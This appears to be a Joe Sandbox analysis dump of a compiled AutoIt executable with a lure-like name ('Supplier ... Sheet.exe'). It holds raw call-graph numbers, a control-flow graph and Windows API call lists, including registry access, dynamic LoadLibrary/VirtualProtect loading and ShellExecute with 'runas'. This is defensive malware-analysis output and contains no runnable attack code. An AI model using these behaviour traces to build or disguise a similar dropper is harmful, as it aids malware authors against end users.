d8100d 106367->106368 106424 d8e08f 106368->106424 106372 d8105e 106381 d7c935 48 API calls 106372->106381 106374 d81063 106444 dbd520 86 API calls 4 library calls 106374->106444 106375 d80dee 106379 d7d89e 50 API calls 106375->106379 106377 d80dfa 106382 d7d89e 50 API calls 106377->106382 106378 deb772 106446 dbd520 86 API calls 4 library calls 106378->106446 106379->106377 106380 d80119 106445 dbd520 86 API calls 4 library calls 106380->106445 106396 d7fbf1 Mailbox 106381->106396 106386 d80e83 106382->106386 106383 d7f6d0 417 API calls 106399 d7fad8 Mailbox _memmove 106383->106399 106384 d9010a 48 API calls 106384->106399 106385 d7c935 48 API calls 106385->106399 106390 d7caee 48 API calls 106386->106390 106387 d7d3d2 48 API calls 106387->106399 106389 deb7d2 106404 d810f1 Mailbox 106390->106404 106391 d91b2a 52 API calls __cinit 106391->106399 106393 d8103d 106393->106396 106443 dbd520 86 API calls 4 library calls 106393->106443 106397 d7fa40 417 API calls 106397->106399 106399->106372 106399->106374 106399->106375 106399->106377 106399->106378 106399->106380 106399->106383 106399->106384 106399->106385 106399->106386 106399->106387 106399->106391 106399->106393 106399->106396 106399->106397 106401 daa599 InterlockedDecrement 106399->106401 106402 deb583 106399->106402 106399->106404 106405 dc013f 87 API calls 106399->106405 106406 dd1f19 132 API calls 106399->106406 106407 d8f03e 2 API calls 106399->106407 106408 dd0bfa 129 API calls 106399->106408 106409 dd30ad 93 API calls 106399->106409 106410 dd798d 109 API calls 106399->106410 106411 d781c6 85 API calls 106399->106411 106412 dc936f 55 API calls 106399->106412 106413 dd804e 113 API calls 106399->106413 106414 d750a3 49 API calls 106399->106414 106415 d8ef0d 94 API calls 106399->106415 106416 dcb74b 417 API calls 106399->106416 106417 dd17aa 87 API calls 106399->106417 106418 dd10e5 82 API calls 106399->106418 106419 d8f461 98 API calls 106399->106419 106420 dc8065 55 API calls 106399->106420 106421 d8dd84 3 API calls 106399->106421 106422 dc92c0 88 API calls 106399->106422 106423 dc9122 91 API calls 106399->106423 106436 d81620 59 API calls Mailbox 106399->106436 106437 dcee52 82 API calls 2 library calls 106399->106437 106438 dcef9d 90 API calls Mailbox 106399->106438 106439 dbb020 48 API calls 106399->106439 106440 dce713 417 API calls Mailbox 106399->106440 106401->106399 106441 dbd520 86 API calls 4 library calls 106402->106441 106442 dbd520 86 API calls 4 library calls 106404->106442 106405->106399 106406->106399 106407->106399 106408->106399 106409->106399 106410->106399 106411->106399 106412->106399 106413->106399 106414->106399 106415->106399 106416->106399 106417->106399 106418->106399 106419->106399 106420->106399 106421->106399 106422->106399 106423->106399 106425 d77b6e 48 API calls 106424->106425 106426 d8e0b4 _wcscmp 106425->106426 106427 d7caee 48 API calls 106426->106427 106429 d8e0e2 Mailbox 106426->106429 106428 deb9c7 106427->106428 106447 d77b4b 48 API calls Mailbox 106428->106447 106429->106399 106431 deb9d5 106432 d7d2d2 53 API calls 106431->106432 106433 deb9e7 106432->106433 106434 d7d89e 50 API calls 106433->106434 106435 deb9ec Mailbox 106433->106435 106434->106435 106435->106399 106436->106399 106437->106399 106438->106399 106439->106399 106440->106399 106441->106404 106442->106396 106443->106374 106444->106380 106445->106378 106446->106389 106447->106431 106448 de1eed 106453 d8e975 106448->106453 106450 de1f01 106469 d91b2a 52 API calls __cinit 106450->106469 106452 de1f0b 106454 d9010a 48 API calls 106453->106454 106455 d8ea27 GetModuleFileNameW 106454->106455 106456 d9297d __wsplitpath 47 API calls 106455->106456 106457 d8ea5b _wcsncat 106456->106457 106470 d92bff 106457->106470 106460 d9010a 48 API calls 106461 d8ea94 _wcscpy 106460->106461 106462 d7d3d2 48 API calls 106461->106462 106463 d8eacf 106462->106463 106473 d8eb05 106463->106473 106465 d8eae0 Mailbox 106465->106450 106466 d7a4f6 48 API calls 106467 d8eada _wcscat __NMSG_WRITE _wcsncpy 106466->106467 106467->106465 106467->106466 106468 d9010a 48 API calls 106467->106468 106468->106467 106469->106452 106487 d9aab9 106470->106487 106474 d7c4cd 48 API calls 106473->106474 106475 d8eb14 RegOpenKeyExW 106474->106475 106476 de4b17 RegQueryValueExW 106475->106476 106477 d8eb35 106475->106477 106478 de4b30 106476->106478 106479 de4b91 RegCloseKey 106476->106479 106477->106467 106480 d9010a 48 API calls 106478->106480 106481 de4b49 106480->106481 106482 d74bce 48 API calls 106481->106482 106483 de4b53 RegQueryValueExW 106482->106483 106484 de4b6f 106483->106484 106486 de4b86 106483->106486 106485 d77e53 48 API calls 106484->106485 106485->106486 106486->106479 106488 d9aaca 106487->106488 106489 d9abc6 106487->106489 106488->106489 106495 d9aad5 106488->106495 106497 d9889e 47 API calls __getptd_noexit 106489->106497 106491 d9abbb 106498 d97aa0 8 API calls __vswprintf_l 106491->106498 106493 d8ea8a 106493->106460 106495->106493 106496 d9889e 47 API calls __getptd_noexit 106495->106496 106496->106491 106497->106491 106498->106493 106499 de1eca 106504 d8be17 106499->106504 106503 de1ed9 106505 d7d3d2 48 API calls 106504->106505 106506 d8be85 106505->106506 106512 d8c929 106506->106512 106508 d8bf22 106509 d8bf3e 106508->106509 106515 d8c8b7 48 API calls _memmove 106508->106515 106511 d91b2a 52 API calls __cinit 106509->106511 106511->106503 106516 d8c955 106512->106516 106515->106508 106517 d8c948 106516->106517 106518 d8c962 106516->106518 106517->106508 106518->106517 106519 d8c969 RegOpenKeyExW 106518->106519 106519->106517 106520 d8c983 RegQueryValueExW 106519->106520 106521 d8c9b9 RegCloseKey 106520->106521 106522 d8c9a4 106520->106522 106521->106517 106522->106521 106523 de1e8b 106528 d8e44f 106523->106528 106527 de1e9a 106529 d9010a 48 API calls 106528->106529 106530 d8e457 106529->106530 106531 d8e46b 106530->106531 106536 d8e74b 106530->106536 106535 d91b2a 52 API calls __cinit 106531->106535 106535->106527 106537 d8e754 106536->106537 106538 d8e463 106536->106538 106568 d91b2a 52 API calls __cinit 106537->106568 106540 d8e47b 106538->106540 106541 d7d3d2 48 API calls 106540->106541 106542 d8e492 GetVersionExW 106541->106542 106543 d77e53 48 API calls 106542->106543 106544 d8e4d5 106543->106544 106569 d8e5f8 106544->106569 106547 d8e617 48 API calls 106550 d8e4e9 106547->106550 106549 de29f9 106550->106549 106573 d8e6d1 106550->106573 106552 d8e55f GetCurrentProcess 106582 d8e70e LoadLibraryA GetProcAddress 106552->106582 106553 d8e576 106554 d8e5ec GetSystemInfo 106553->106554 106555 d8e59e 106553->106555 106558 d8e5c9 106554->106558 106576 d8e694 106555->106576 106560 d8e5dc 106558->106560 106561 d8e5d7 FreeLibrary 106558->106561 106560->106531 106561->106560 106562 d8e5e4 GetSystemInfo 106565 d8e5be 106562->106565 106563 d8e5b4 106579 d8e437 106563->106579 106565->106558 106567 d8e5c4 FreeLibrary 106565->106567 106567->106558 106568->106538 106570 d8e601 106569->106570 106571 d7a2fb 48 API calls 106570->106571 106572 d8e4dd 106571->106572 106572->106547 106583 d8e6e3 106573->106583 106587 d8e6a6 106576->106587 106580 d8e694 2 API calls 106579->106580 106581 d8e43f GetNativeSystemInfo 106580->106581 106581->106565 106582->106553 106584 d8e55b 106583->106584 106585 d8e6ec LoadLibraryA 106583->106585 106584->106552 106584->106553 106585->106584 106586 d8e6fd GetProcAddress 106585->106586 106586->106584 106588 d8e5ac 106587->106588 106589 d8e6af LoadLibraryA 106587->106589 106588->106562 106588->106563 106589->106588 106590 d8e6c0 GetProcAddress 106589->106590 106590->106588 106591 d729c2 106592 d729cb 106591->106592 106593 d729e9 106592->106593 106594 d72a48 106592->106594 106630 d72a46 106592->106630 106595 d729f6 106593->106595 106596 d72aac PostQuitMessage 106593->106596 106598 de2307 106594->106598 106599 d72a4e 106594->106599 106601 de238f 106595->106601 106602 d72a01 106595->106602 106623 d72a39 106596->106623 106597 d72a2b NtdllDefWindowProc_W 106597->106623 106646 d7322e 16 API calls 106598->106646 106603 d72a76 SetTimer RegisterClipboardFormatW 106599->106603 106604 d72a53 106599->106604 106652 db57fb 60 API calls _memset 106601->106652 106606 d72ab6 106602->106606 106607 d72a09 106602->106607 106608 d72a9f CreatePopupMenu 106603->106608 106603->106623 106610 de22aa 106604->106610 106611 d72a5a KillTimer 106604->106611 106605 de232e 106647 d8ec33 417 API calls Mailbox 106605->106647 106636 d71e58 106606->106636 106613 d72a14 106607->106613 106614 de2374 106607->106614 106608->106623 106617 de22af 106610->106617 106618 de22e3 MoveWindow 106610->106618 106643 d72b94 Shell_NotifyIconW _memset 106611->106643 106621 d72a1f 106613->106621 106622 de235f 106613->106622 106614->106597 106651 dab31f 48 API calls 106614->106651 106615 de23a1 106615->106597 106615->106623 106624 de22d2 SetFocus 106617->106624 106625 de22b3 106617->106625 106618->106623 106620 d72a6d 106644 d72ac7 DeleteObject DestroyWindow Mailbox 106620->106644 106621->106597 106648 d72b94 Shell_NotifyIconW _memset 106621->106648 106650 db5fdb 70 API calls _memset 106622->106650 106624->106623 106625->106621 106628 de22bc 106625->106628 106645 d7322e 16 API calls 106628->106645 106630->106597 106632 de236f 106632->106623 106634 de2353 106649 d73598 67 API calls _memset 106634->106649 106637 d71ef1 106636->106637 106638 d71e6f _memset 106636->106638 106637->106623 106653 d738e4 106638->106653 106640 d71eda KillTimer SetTimer 106640->106637 106641 d71e96 106641->106640 106642 de4518 Shell_NotifyIconW 106641->106642 106642->106640 106643->106620 106644->106623 106645->106623 106646->106605 106647->106621 106648->106634 106649->106630 106650->106632 106651->106630 106652->106615 106654 d739d5 Mailbox 106653->106654 106655 d73900 106653->106655 106654->106641 106656 d77b6e 48 API calls 106655->106656 106657 d7390e 106656->106657 106658 de453f LoadStringW 106657->106658 106659 d7391b 106657->106659 106662 de4559 106658->106662 106660 d77e53 48 API calls 106659->106660 106661 d73930 106660->106661 106661->106662 106663 d73941 106661->106663 106676 d739e8 48 API calls 2 library calls 106662->106676 106665 d7394b 106663->106665 106666 d739da 106663->106666 106675 d739e8 48 API calls 2 library calls 106665->106675 106668 d7c935 48 API calls 106666->106668 106667 de4564 106670 de4578 106667->106670 106673 d73956 _memset _wcscpy 106667->106673 106668->106673 106677 d739e8 48 API calls 2 library calls 106670->106677 106672 de4586 106674 d739ba Shell_NotifyIconW 106673->106674 106674->106654 106675->106673 106676->106667 106677->106672 106678 dec146 GetUserNameW 106679 d96a80 106680 d96a8c __fcloseall 106679->106680 106716 d98b7b GetStartupInfoW 106680->106716 106682 d96a91 106718 d9a937 GetProcessHeap 106682->106718 106684 d96ae9 106685 d96af4 106684->106685 106803 d96bd0 47 API calls 3 library calls 106684->106803 106719 d987d7 106685->106719 106688 d96afa 106689 d96b05 __RTC_Initialize 106688->106689 106804 d96bd0 47 API calls 3 library calls 106688->106804 106740 d9ba66 106689->106740 106692 d96b14 106693 d96b20 GetCommandLineW 106692->106693 106805 d96bd0 47 API calls 3 library calls 106692->106805 106759 da3c2d GetEnvironmentStringsW 106693->106759 106696 d96b1f 106696->106693 106700 d96b45 106772 da3a64 106700->106772 106703 d96b4b 106704 d96b56 106703->106704 106807 d91d7b 47 API calls 3 library calls 106703->106807 106786 d91db5 106704->106786 106707 d96b5e 106708 d96b69 __wwincmdln 106707->106708 106808 d91d7b 47 API calls 3 library calls 106707->106808 106717 d98b91 106716->106717 106717->106682 106718->106684 106811 d91e5a 30 API calls 2 library calls 106719->106811 106721 d987dc 106812 d98ab3 InitializeCriticalSectionAndSpinCount 106721->106812 106723 d987e1 106724 d987e5 106723->106724 106814 d98afd TlsAlloc 106723->106814 106813 d9884d 50 API calls 2 library calls 106724->106813 106727 d987ea 106727->106688 106728 d987f7 106728->106724 106729 d98802 106728->106729 106815 d97616 106729->106815 106732 d98844 106823 d9884d 50 API calls 2 library calls 106732->106823 106735 d98849 106735->106688 106736 d98823 106736->106732 106737 d98829 106736->106737 106822 d98724 47 API calls 4 library calls 106737->106822 106739 d98831 GetCurrentThreadId 106739->106688 106741 d9ba72 __fcloseall 106740->106741 106832 d98984 106741->106832 106743 d9ba79 106744 d97616 __calloc_crt 47 API calls 106743->106744 106746 d9ba8a 106744->106746 106745 d9baf5 GetStartupInfoW 106754 d9bb0a 106745->106754 106756 d9bc33 106745->106756 106746->106745 106747 d9ba95 __fcloseall @_EH4_CallFilterFunc@8 106746->106747 106747->106692 106748 d9bcf7 106839 d9bd0b RtlLeaveCriticalSection _doexit 106748->106839 106750 d9bc7c GetStdHandle 106750->106756 106751 d9bb58 106751->106756 106757 d9bb98 InitializeCriticalSectionAndSpinCount 106751->106757 106758 d9bb8a GetFileType 106751->106758 106752 d97616 __calloc_crt 47 API calls 106752->106754 106753 d9bc8e GetFileType 106753->106756 106754->106751 106754->106752 106754->106756 106755 d9bcbb InitializeCriticalSectionAndSpinCount 106755->106756 106756->106748 106756->106750 106756->106753 106756->106755 106757->106751 106758->106751 106758->106757 106760 d96b30 106759->106760 106762 da3c3e 106759->106762 106766 da382b GetModuleFileNameW 106760->106766 106878 d97660 47 API calls __crtLCMapStringA_stat 106762->106878 106764 da3c64 _memmove 106765 da3c7a FreeEnvironmentStringsW 106764->106765 106765->106760 106767 da385f _wparse_cmdline 106766->106767 106768 d96b3a 106767->106768 106769 da3899 106767->106769 106768->106700 106806 d91d7b 47 API calls 3 library calls 106768->106806 106879 d97660 47 API calls __crtLCMapStringA_stat 106769->106879 106771 da389f _wparse_cmdline 106771->106768 106773 da3a7d __NMSG_WRITE 106772->106773 106774 da3a75 106772->106774 106775 d97616 __calloc_crt 47 API calls 106773->106775 106774->106703 106779 da3aa6 __NMSG_WRITE 106775->106779 106776 da3afd 106777 d928ca _free 47 API calls 106776->106777 106777->106774 106778 d97616 __calloc_crt 47 API calls 106778->106779 106779->106774 106779->106776 106779->106778 106780 da3b22 106779->106780 106783 da3b39 106779->106783 106880 da3317 47 API calls __vswprintf_l 106779->106880 106781 d928ca _free 47 API calls 106780->106781 106781->106774 106881 d97ab0 IsProcessorFeaturePresent 106783->106881 106787 d91dc1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 106786->106787 106789 d91e00 __IsNonwritableInCurrentImage 106787->106789 106904 d91b2a 52 API calls __cinit 106787->106904 106789->106707 106803->106685 106804->106689 106805->106696 106811->106721 106812->106723 106813->106727 106814->106728 106818 d9761d 106815->106818 106817 d9765a 106817->106732 106821 d98b59 TlsSetValue 106817->106821 106818->106817 106819 d9763b Sleep 106818->106819 106824 da3e5a 106818->106824 106820 d97652 106819->106820 106820->106817 106820->106818 106821->106736 106822->106739 106823->106735 106825 da3e65 106824->106825 106830 da3e80 __calloc_impl 106824->106830 106826 da3e71 106825->106826 106825->106830 106831 d9889e 47 API calls __getptd_noexit 106826->106831 106828 da3e90 RtlAllocateHeap 106829 da3e76 106828->106829 106828->106830 106829->106818 106830->106828 106830->106829 106831->106829 106833 d989a8 RtlEnterCriticalSection 106832->106833 106834 d98995 106832->106834 106833->106743 106840 d98a0c 106834->106840 106836 d9899b 106836->106833 106864 d91d7b 47 API calls 3 library calls 106836->106864 106839->106747 106841 d98a18 __fcloseall 106840->106841 106842 d98a39 106841->106842 106843 d98a21 106841->106843 106844 d98a37 106842->106844 106850 d98aa1 __fcloseall 106842->106850 106865 d98e52 47 API calls 2 library calls 106843->106865 106844->106842 106868 d97660 47 API calls __crtLCMapStringA_stat 106844->106868 106847 d98a26 106866 d98eb2 47 API calls 6 library calls 106847->106866 106848 d98a4d 106851 d98a63 106848->106851 106852 d98a54 106848->106852 106850->106836 106855 d98984 __lock 46 API calls 106851->106855 106869 d9889e 47 API calls __getptd_noexit 106852->106869 106853 d98a2d 106867 d91d65 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 106853->106867 106858 d98a6a 106855->106858 106857 d98a59 106857->106850 106859 d98a79 InitializeCriticalSectionAndSpinCount 106858->106859 106860 d98a8e 106858->106860 106861 d98a94 106859->106861 106870 d928ca 106860->106870 106876 d98aaa RtlLeaveCriticalSection _doexit 106861->106876 106865->106847 106866->106853 106868->106848 106869->106857 106871 d928fc _free 106870->106871 106872 d928d3 RtlFreeHeap 106870->106872 106871->106861 106872->106871 106873 d928e8 106872->106873 106877 d9889e 47 API calls __getptd_noexit 106873->106877 106875 d928ee GetLastError 106875->106871 106876->106850 106877->106875 106878->106764 106879->106771 106880->106779 106882 d97abb 106881->106882 106887 d97945 106882->106887 106888 d9795f _memset ___raise_securityfailure 106887->106888 106904->106789 107667 debc25 107668 debc27 107667->107668 107671 db79f8 SHGetFolderPathW 107668->107671 107670 debc30 107670->107670 107672 d77e53 48 API calls 107671->107672 107673 db7a25 107672->107673 107673->107670 107674 ed20b0 107675 ed20c0 107674->107675 107676 ed21da LoadLibraryA 107675->107676 107679 ed221f VirtualProtect VirtualProtect 107675->107679 107677 ed21f1 107676->107677 107677->107675 107681 ed2203 GetProcAddress 107677->107681 107680 ed2284 107679->107680 107680->107680 107681->107677 107682 ed2219 ExitProcess 107681->107682 107683 d7e849 107686 d826c0 107683->107686 107685 d7e852 107687 de862d 107686->107687 107688 d8273b 107686->107688 107808 dbd520 86 API calls 4 library calls 107687->107808 107690 d82adc 107688->107690 107691 d8277c 107688->107691 107703 d8279a 107688->107703 107807 d7d349 53 API calls 107690->107807 107731 d828f6 107691->107731 107803 d7d500 53 API calls __cinit 107691->107803 107692 de863e 107809 dbd520 86 API calls 4 library calls 107692->107809 107693 d827cf 107693->107692 107695 d827db 107693->107695 107694 d82a84 107702 d7d380 55 API calls 107694->107702 107697 d827ef 107695->107697 107710 de865a 107695->107710 107700 de86c9 107697->107700 107701 d82806 107697->107701 107706 de8ac9 107700->107706 107709 d7fa40 417 API calls 107700->107709 107704 d7fa40 417 API calls 107701->107704 107705 d82aab 107702->107705 107703->107693 107703->107694 107714 d82914 107703->107714 107742 d8281d 107704->107742 107708 d7d2d2 53 API calls 107705->107708 107824 dbd520 86 API calls 4 library calls 107706->107824 107708->107714 107711 de86ee 107709->107711 107710->107700 107725 d829ec 107710->107725 107810 dcf211 417 API calls 107710->107810 107811 dcf4df 417 API calls 107710->107811 107716 d7d89e 50 API calls 107711->107716 107723 de870a 107711->107723 107711->107725 107713 de8980 107819 dbd520 86 API calls 4 library calls 107713->107819 107717 d7cdb4 48 API calls 107714->107717 107715 d82836 107715->107706 107720 d7fa40 417 API calls 107715->107720 107716->107723 107726 d8296e 107717->107726 107744 d8287c 107720->107744 107721 d7c935 48 API calls 107721->107715 107722 d828cc 107722->107731 107804 d7cf97 58 API calls 107722->107804 107730 de878d 107723->107730 107812 d7346e 48 API calls 107723->107812 107725->107685 107726->107725 107735 d82984 107726->107735 107740 de8a97 107726->107740 107747 de89b4 107726->107747 107727 d828ac 107727->107722 107817 d7cf97 58 API calls 107727->107817 107729 de883f 107815 dcc235 417 API calls Mailbox 107729->107815 107730->107729 107734 de882d 107730->107734 107813 db4e71 53 API calls __cinit 107730->107813 107739 d82900 107731->107739 107818 d7cf97 58 API calls 107731->107818 107736 d7ca8e 48 API calls 107734->107736 107735->107740 107805 d841fc 84 API calls 107735->107805 107736->107729 107737 de8888 107741 de888c 107737->107741 107737->107742 107739->107713 107739->107714 107740->107725 107823 d74b02 50 API calls 107740->107823 107816 dbd520 86 API calls 4 library calls 107741->107816 107742->107715 107742->107721 107742->107725 107744->107725 107744->107727 107751 d7fa40 417 API calls 107744->107751 107789 dcbf80 107747->107789 107749 d829b8 107752 de8a7e 107749->107752 107806 d841fc 84 API calls 107749->107806 107758 de88ff 107751->107758 107822 d8ee93 84 API calls 107752->107822 107753 de8725 107753->107734 107765 d814a0 48 API calls 107753->107765 107754 de89f3 107766 de8a42 107754->107766 107767 de8a01 107754->107767 107755 de8813 107762 d7d89e 50 API calls 107755->107762 107756 de87ca 107756->107755 107760 d784a6 81 API calls 107756->107760 107758->107725 107763 d7d89e 50 API calls 107758->107763 107777 de87e0 107760->107777 107761 d829ca 107761->107725 107768 de8a6f 107761->107768 107769 d829e5 107761->107769 107764 de8821 107762->107764 107763->107727 107770 d7d89e 50 API calls 107764->107770 107771 de875d 107765->107771 107773 d7d89e 50 API calls 107766->107773 107772 d7ca8e 48 API calls 107767->107772 107821 dcd1da 50 API calls 107768->107821 107775 d9010a 48 API calls 107769->107775 107770->107734 107771->107734 107778 d814a0 48 API calls 107771->107778 107772->107725 107776 de8a4b 107773->107776 107775->107725 107780 d7d89e 50 API calls 107776->107780 107777->107755 107814 dba76d 49 API calls 107777->107814 107779 de8775 107778->107779 107782 d7d89e 50 API calls 107779->107782 107783 de8a57 107780->107783 107785 de8781 107782->107785 107820 d74b02 50 API calls 107783->107820 107784 de8807 107787 d7d89e 50 API calls 107784->107787 107788 d7d89e 50 API calls 107785->107788 107787->107755 107788->107730 107794 dcbfd9 _memset 107789->107794 107791 dcc22e 107791->107754 107792 dcc14c 107793 dcc19f VariantInit VariantClear 107792->107793 107800 dcc033 107792->107800 107795 dcc1c5 107793->107795 107794->107792 107796 dcc097 VariantInit 107794->107796 107794->107800 107798 dcc1e6 107795->107798 107795->107800 107801 dcc0d6 107796->107801 107826 dba6f6 103 API calls 107798->107826 107799 dcc20d VariantClear 107799->107791 107827 dcc235 417 API calls Mailbox 107800->107827 107801->107800 107825 dba6f6 103 API calls 107801->107825 107803->107703 107804->107731 107805->107749 107806->107761 107807->107727 107808->107692 107809->107710 107810->107710 107811->107710 107812->107753 107813->107756 107814->107784 107815->107737 107816->107725 107817->107722 107818->107739 107819->107725 107820->107725 107821->107752 107822->107740 107823->107706 107824->107725 107825->107792 107826->107799 107827->107791

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 00D7376D
                                                                                                                    • Part of subcall function 00D74257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe,00000104,?,00000000,00000001,00000000), ref: 00D7428C
                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?), ref: 00D7377F
                                                                                                                  • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe,00000104,?,00E31120,C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe,00E31124,?,?), ref: 00D737EE
                                                                                                                    • Part of subcall function 00D734F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00D7352A
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00D73860
                                                                                                                  • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00E22934,00000010), ref: 00DE21C5
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?), ref: 00DE21FD
                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00DE2232
                                                                                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00E0DAA4), ref: 00DE2290
                                                                                                                  • ShellExecuteW.SHELL32(00000000), ref: 00DE2297
                                                                                                                    • Part of subcall function 00D730A5: GetSysColorBrush.USER32(0000000F), ref: 00D730B0
                                                                                                                    • Part of subcall function 00D730A5: LoadCursorW.USER32(00000000,00007F00), ref: 00D730BF
                                                                                                                    • Part of subcall function 00D730A5: LoadIconW.USER32(00000063), ref: 00D730D5
                                                                                                                    • Part of subcall function 00D730A5: LoadIconW.USER32(000000A4), ref: 00D730E7
                                                                                                                    • Part of subcall function 00D730A5: LoadIconW.USER32(000000A2), ref: 00D730F9
                                                                                                                    • Part of subcall function 00D730A5: RegisterClassExW.USER32(?), ref: 00D73167
                                                                                                                    • Part of subcall function 00D72E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00D72ECB
                                                                                                                    • Part of subcall function 00D72E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00D72EEC
                                                                                                                    • Part of subcall function 00D72E9D: ShowWindow.USER32(00000000), ref: 00D72F00
                                                                                                                    • Part of subcall function 00D72E9D: ShowWindow.USER32(00000000), ref: 00D72F09
                                                                                                                    • Part of subcall function 00D73598: _memset.LIBCMT ref: 00D735BE
                                                                                                                    • Part of subcall function 00D73598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00D73667
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                                                  • String ID: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas$"
                                                                                                                  • API String ID: 4253510256-752551368
                                                                                                                  • Opcode ID: 5566c5fe16c31ad1ce2f238e56ab9627547c52262b865869a36d5ba5924667b6
                                                                                                                  • Instruction ID: 57b089fbcac491318dae18e3b59514a5dc9e054ea0030bad52ac53be77cfd699
                                                                                                                  • Opcode Fuzzy Hash: 5566c5fe16c31ad1ce2f238e56ab9627547c52262b865869a36d5ba5924667b6
                                                                                                                  • Instruction Fuzzy Hash: 8951F871644388BECB10ABA19C4ABFD7F79DB55700F04809DF749A2191E7708A45EB73

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1168 dd30ad-dd315b call d7ca8e call d7d3d2 * 3 call d784a6 call dd3d7b call dd3af7 1183 dd315d-dd3161 1168->1183 1184 dd3166-dd3170 1168->1184 1185 dd31e6-dd31f2 call dbd7e4 1183->1185 1186 dd31a2 1184->1186 1187 dd3172-dd3187 RegConnectRegistryW 1184->1187 1197 dd3504-dd3527 call d75cd3 * 3 1185->1197 1191 dd31a6-dd31c3 RegOpenKeyExW 1186->1191 1189 dd319c-dd31a0 1187->1189 1190 dd3189-dd319a call d77ba9 1187->1190 1189->1191 1190->1185 1192 dd31c5-dd31d7 call d77ba9 1191->1192 1193 dd31f7-dd3227 call d784a6 RegQueryValueExW 1191->1193 1204 dd31d9-dd31dd RegCloseKey 1192->1204 1205 dd31e3-dd31e4 1192->1205 1206 dd323e-dd3254 call d77ba9 1193->1206 1207 dd3229-dd3239 call d77ba9 1193->1207 1204->1205 1205->1185 1214 dd34dc-dd34dd 1206->1214 1215 dd325a-dd325f 1206->1215 1217 dd34df-dd34e6 call dbd7e4 1207->1217 1214->1217 1218 dd344c-dd3498 call d9010a call d784a6 RegQueryValueExW 1215->1218 1219 dd3265-dd3268 1215->1219 1225 dd34eb-dd34fc RegCloseKey 1217->1225 1245 dd349a-dd34a6 1218->1245 1246 dd34b4-dd34ce call d77ba9 call dbd7e4 1218->1246 1222 dd326e-dd3273 1219->1222 1223 dd33d9-dd3411 call dbad14 call d784a6 RegQueryValueExW 1219->1223 1226 dd338d-dd33d4 call d784a6 RegQueryValueExW call d82570 1222->1226 1227 dd3279-dd327c 1222->1227 1223->1225 1248 dd3417-dd3447 call d77ba9 call dbd7e4 call d82570 1223->1248 1225->1197 1229 dd34fe-dd3502 RegCloseKey 1225->1229 1226->1225 1232 dd32de-dd332b call d9010a call d784a6 RegQueryValueExW 1227->1232 1233 dd327e-dd3281 1227->1233 1229->1197 1232->1246 1258 dd3331-dd3348 1232->1258 1233->1214 1237 dd3287-dd32d9 call d784a6 RegQueryValueExW call d82570 1233->1237 1237->1225 1247 dd34aa-dd34b2 call d7ca8e 1245->1247 1264 dd34d3-dd34da call d9017e 1246->1264 1247->1264 1248->1225 1258->1247 1263 dd334e-dd3355 1258->1263 1266 dd335c-dd3361 1263->1266 1267 dd3357-dd3358 1263->1267 1264->1225 1270 dd3376-dd337b 1266->1270 1271 dd3363-dd3367 1266->1271 1267->1266 1270->1247 1276 dd3381-dd3388 1270->1276 1274 dd3369-dd336d 1271->1274 1275 dd3371-dd3374 1271->1275 1274->1275 1275->1270 1275->1271 1276->1247
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DD3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DD2AA6,?,?), ref: 00DD3B0E
                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DD317F
                                                                                                                    • Part of subcall function 00D784A6: __swprintf.LIBCMT ref: 00D784E5
                                                                                                                    • Part of subcall function 00D784A6: __itow.LIBCMT ref: 00D78519
                                                                                                                  • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?), ref: 00DD321E
                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00DD32B6
